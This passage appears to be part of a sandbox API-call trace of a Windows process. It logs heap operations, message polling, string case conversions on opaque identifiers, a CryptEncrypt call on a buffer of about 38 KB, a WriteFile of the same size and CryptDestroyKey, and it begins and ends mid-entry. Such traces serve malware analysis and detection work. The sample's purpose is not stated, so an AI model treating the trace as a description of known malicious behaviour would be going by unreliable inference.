dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.786] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.786] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0215.786] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0215.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0215.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72578 | out: hHeap=0x2af0000) returned 1 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0215.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0215.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72578 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab998 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0215.789] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0215.789] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.789] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab7d0 [0215.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0215.790] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.790] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.790] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba10 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.790] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0215.790] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9e0 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab9b0 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7d0 | out: hHeap=0x2af0000) returned 1 [0215.790] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab770 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab878 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab860 | out: hHeap=0x2af0000) returned 1 [0215.791] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2ab7f78 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabce0 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0215.792] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd28 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0215.793] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc20 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba88 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc38 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabad0 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc68 | out: hHeap=0x2af0000) returned 1 [0215.793] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0215.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.793] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaba58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.793] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x96f7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x96f8) returned 1 [0215.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.794] CharLowerBuffW (in: lpsz="byte[38648]", cchLength=0xb | out: lpsz="byte[38648]") returned 0xb [0215.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.795] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.795] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.795] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.795] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.795] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.795] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0215.795] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0215.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aaba88, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0215.795] CryptEncrypt (in: hKey=0x9e1c38, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2ab7f78*, pdwDataLen=0x8cef60*=0x96f7, dwBufLen=0x96f8 | out: pbData=0x2ab7f78*, pdwDataLen=0x8cef60*=0x96f8) returned 1 [0215.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.796] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.797] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.797] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.797] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.797] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.797] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.797] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.797] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.797] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.797] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.797] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.797] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.797] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0215.797] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0215.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.800] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.801] WriteFile (in: hFile=0x504, lpBuffer=0x2a93838*, nNumberOfBytesToWrite=0x96f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a93838*, lpNumberOfBytesWritten=0x8cf5e4*=0x96f8, lpOverlapped=0x0) returned 1 [0215.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.802] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0215.802] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.802] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0215.803] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.803] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.803] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0215.803] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.803] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0215.803] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.803] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0215.803] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0215.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0215.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab980, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0215.803] CryptDestroyKey (hKey=0x9e1c38) returned 1 [0215.803] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.803] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0215.803] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0215.803] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.803] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0215.803] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.803] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0215.803] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0215.803] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.803] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0215.804] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.804] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.804] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0215.804] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 